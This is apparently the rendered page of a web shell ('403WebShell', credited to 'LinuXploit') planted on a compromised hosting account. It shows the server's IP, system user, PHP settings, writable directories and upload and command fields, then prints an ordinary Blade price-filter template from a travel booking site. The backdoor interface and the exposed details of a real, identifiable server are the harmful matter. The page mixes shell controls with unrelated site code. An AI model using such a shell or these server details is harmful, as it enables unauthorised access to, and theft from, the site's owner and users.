Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.17.76.163
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/themes/Mytravel/Boat/frontend/layouts/search-map/fields/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/themes/Mytravel/Boat/frontend/layouts/search-map/fields/price.blade.php
<div class="item filter-item dropdown filter-simple">
    <div class="border-bottom border-width-2 border-color-1 mb-0 form-content dropdown-toggle" data-toggle="dropdown">
        <h3 class="filter-title">{{__('Price filter')}} <i class="fa fa-angle-down"></i></h3>
    </div>
    <div class="filter-dropdown dropdown-menu dropdown-menu-right">
        <div class="bravo-filter-price">
            @php
                $price_min = $pri_from = floor(App\Currency::convertPrice($boat_min_max_price[0]));
                 $price_max = $pri_to = ceil(App\Currency::convertPrice($boat_min_max_price[1]));
                 if (!empty($price_range = Request::query('price_range'))) {
                 $pri_from = explode(";", $price_range)[0];
                 $pri_to = explode(";", $price_range)[1];
                 }
                 $currency = App\Currency::getCurrency(App\Currency::getCurrent());
            @endphp
            <span class="d-block font-size-lg-15 font-size-17 font-weight-bold text-dark mb-2">{{ __("Price Range") }} ({{$currency['symbol'] ?? ''}})</span>
            <div class="pb-3 mb-1 d-flex text-lh-1">
                <span>{{$currency['symbol'] ?? ''}}</span>
                <span id="rangeSliderMinResult"></span>
                <span class="mx-0dot5"> — </span>
                <span>{{$currency['symbol'] ?? ''}}</span>
                <span id="rangeSliderMaxResult"></span>
            </div>
            <input class="filter-price" type="text" name="price_range"
                   data-extra-classes="u-range-slider height-35"
                   data-type="double"
                   data-grid="false"
                   data-hide-from-to="true"
                   data-min="{{$price_min}}"
                   data-max="{{$price_max}}"
                   data-from="{{$pri_from}}"
                   data-to="{{$pri_to}}"
                   data-prefix="{{$currency['symbol'] ?? ''}}"
                   data-result-min="#rangeSliderMinResult"
                   data-result-max="#rangeSliderMaxResult">
            <div class="text-right">
                <a href="#" onclick="return false;" class="btn btn-primary btn-sm btn-apply-advances">{{__("APPLY")}}</a>
            </div>
        </div>
    </div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit